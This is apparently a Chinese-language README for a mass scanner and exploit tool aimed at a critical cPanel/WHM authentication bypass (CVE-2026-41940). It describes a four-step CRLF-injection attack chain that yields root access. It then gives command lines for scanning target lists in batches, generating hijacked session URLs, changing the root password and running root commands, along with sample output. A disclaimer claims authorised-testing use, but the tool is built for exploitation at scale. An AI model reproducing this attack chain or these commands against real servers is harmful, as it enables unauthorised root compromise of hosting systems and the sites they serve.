Lutfifakee-Project/CVE-2026-41940
GitHub: Lutfifakee-Project/CVE-2026-41940
针对 cPanel/WHM CVE-2026-41940 身份验证绕过漏洞的批量扫描与利用工具,实现了从漏洞检测到 root 级 RCE 的完整攻击链。
Stars: 1 | Forks: 0
# CVE-2026-41940 - cPanel/WHM 身份验证绕过扫描与利用工具
[](https://www.python.org/)
[](LICENSE)
[](https://github.com/Lutfifakee-Project)
[]()
**针对 CVE-2026-41940 的 cPanel/WHM 身份验证绕过扫描与利用工具**
## ⚠️ 免责声明
本工具仅供**教育目的和授权安全测试使用**。
使用本工具即表示您同意:
- 您仅测试您**拥有**或已获得**明确书面许可**进行测试的系统。
- 您了解**未经授权访问计算机系统是违法行为**。
- 您对使用本工具期间的行为负全部责任。
- **您不得重新分发、修改或将本工具据为己有。**
❗ 作者**对因使用本工具而导致的任何滥用、非法活动、损害或法律后果概不负责**。
## 🎯 概述
CVE-2026-41940 是 cPanel/WHM 中的一个严重身份验证绕过漏洞,可能允许攻击者在没有有效凭证的情况下获得未经授权的 root 级别访问权限。
本工具提供了一个基于 Python 的实现,可用于:
- 检测目标漏洞
- 自动化漏洞利用(用于授权测试)
- 执行大规模扫描
## 🔥 4 阶段攻击链
| 阶段 | 描述 |
|------|------------|
| **1. 预身份验证** | 向 `/login/` 发送无效凭证以获取 `whostmgrsession` cookie |
| **2. CRLF 注入** | 通过 `Authorization: Basic` 请求头注入换行符以泄露 `cpsess` token |
| **3. Token 传播** | 触发 `do_token_denied` 以将 token 传播到缓存中 |
| **4. 验证** | 访问 `/json-api/version` 以确认 WHM root 访问权限 |
## ✨ 功能特性
| 功能 | 描述 |
|--------|------------|
| 🔄 批量扫描 | 并发扫描多个目标 |
| 🎯 单一目标 | 扫描单个目标并输出详细信息 |
| 🔌 端口扫描 | 自动扫描 WHM 端口 (2082, 2083, 2086, 2087) |
| 🔓 Session URL | 生成一键 WHM 登录 URL |
| 💀 RCE | 以 root 身份执行系统命令 |
| 🔑 修改密码 | 更改 WHM root 密码 |
| 📡 WHM API 调用 | 调用 WHM API 函数 |
| 🎨 彩色输出 | 结果的可视化输出 |
| 💾 导出结果 | 将存在漏洞的目标保存到文件 |
## 📋 环境要求
```
Python 3.7+
pip install requests urllib3
```
## 🚀 安装说明
```
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt
# 使用单一目标测试
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com
```
## 📖 使用说明
### 基本命令
```
# 单一目标
python cpanel-mass-checker.py -u https://target.com:2087
# Batch scan
python cpanel-mass-checker.py -f targets.txt -c 20
# 带端口扫描的 Batch scan
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt
# 生成 session URL
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com
# 更改 root 密码
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com
# 执行命令 (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com
# WHM API 调用
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com
```
## 📄 目标文件格式 (`targets.txt`)
```
# 以 # 开头的行是注释
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083
```
## ⚙️ 参数
| 参数 | 描述 | 示例 |
|----------|------------|--------|
| -u | 单个目标 URL | -u https://target.com:2087 |
| -f | 目标列表文件 | -f targets.txt |
| -c | 并发数 (线程数) | -c 20 |
| -o | 输出文件 | -o results.txt |
| -hostname | 自定义 Host 请求头 | -hostname cpanel.target.com |
| --scan-ports | 扫描所有 WHM 端口 | --scan-ports |
| -session | 生成登录 URL | -session |
| -passwd | 更改 root 密码 | -passwd "NewPass123" |
| -cmd | 执行命令 | -cmd "id" |
| -keep | 保留临时账户 | -keep |
| -api | 调用 WHM API | -api listaccts |
| -api-params | API 参数 | -api-params "user=root,password=123" |
## 📊 输出示例
### 批量扫描
```
[*] Total: 4 targets (after dedup), concurrency: 10
[*] Port scanning: ON (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [VULN] https://example.com:2087 - token=/cpsess1048057410
[1/4] [SAFE] safe-target.com
------------------------------------------------------------
[*] Scan completed. Vulnerable: 1
[+] Results saved to result.txt
```
### Session URL 生成
```
[0] hostname = example.com
[1] minting a preauth session...
[2] sending the CRLF injection...
[3] firing do_token_denied...
[4] verifying WHM root access...
[+] WHM root access obtained!
[+] Session URL:
https://example.com:2087/cpsessXXXXXXX/
```
## 🛡️ 漏洞详情
| 字段 | 值 |
|------|------|
| CVE | CVE-2026-41940 |
| 严重性 | Critical (CVSS 9.8) |
| 攻击向量 | 网络 |
| 所需权限 | 无 |
| 用户交互 | 无 |
### 受影响版本
- WHM 11.110.x < 11.110.0.97
- WHM 11.118.x < 11.118.0.63
- WHM 11.126.x < 11.126.0.54
- WHM 11.132.x < 11.132.0.29
- WHM 11.134.x < 11.134.0.20
- WHM 11.136.x < 11.136.0.5
## ⚠️ 重要提示
- 仅在已授权的系统上使用
- Session token 过期速度很快
- RCE 在受限许可证上可能会失败
- 某些目标需要 `-hostname`
- 所有流量均使用 HTTPS
## 🧪 测试环境
为安全且合法的测试:
- 使用您自己的 VPS/服务器
- 搭建一个存在漏洞的实验环境
- 始终获取书面许可
## ⭐ 支持
如果这个项目对您有帮助,请考虑给它一个 ⭐
标签:CISA项目, cPanel, CRLF注入, CVE-2026-41940, Maven, PoC, Python, Root权限, Session劫持, Web安全, WHM, 威胁情报, 开发者工具, 批量扫描器, 提权, 无后门, 暴力破解, 未授权访问, 漏洞验证, 系统独立性, 网络安全, 自动化攻击, 蓝队分析, 身份验证绕过, 逆向工具, 隐私保护